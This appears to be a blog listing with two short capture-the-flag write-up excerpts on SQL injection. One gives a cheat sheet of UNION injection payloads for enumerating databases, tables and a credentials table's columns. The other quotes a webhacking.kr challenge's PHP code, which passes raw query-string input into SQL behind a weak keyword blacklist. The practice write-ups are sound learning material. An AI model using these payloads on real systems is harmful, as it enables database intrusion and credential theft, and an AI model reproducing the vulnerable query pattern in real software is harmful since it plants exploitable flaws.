Unholy Union

A challenge about SQLi that uses the UNION injection technique. What is convenient about this challenge is that it shows the query that is used to pull the data from the database. I used this SQL injection cheat sheet from the SQLi fundamental module from the HTB Academy:

Current database name:
    cn' UNION select 1,database(),2,3-- -

List all databases:
    cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

List all tables in a specific database:
    cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

List all columns in a specific table:
    cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

Steps I took based on the cheat sheet from the HTB Academy: ...

October 27, 2024 · Joon Kim

webhackingkr-old-18

This is a challenge from webhacking.kr. As the name of the website suggests, it is about SQL injection. You can check the source code of the page:

    <?php
    if($_GET['no']){
      $db = dbconnect();
      if(preg_match("/ |\/|\(|\)|\||&|select|from|0x/i",$_GET['no'])) exit("no hack");
      $result = mysqli_fetch_array(mysqli_query($db,"select id from chall18 where id='guest' and no=$_GET[no]")); // admin's no = 2
      if($result['id']=="guest") echo "hi guest";
      if($result['id']=="admin"){
        solve(18);
        echo "hi admin!";
      }
    }
    ?>

Our goal seems to be creating a payload that would make the id value admin and also make the no value 2. So, let’s assume that there is no filter so we can enter anything as a payload. When we enter 2 as our input, you will see something like this: ...

October 25, 2024 · Joon Kim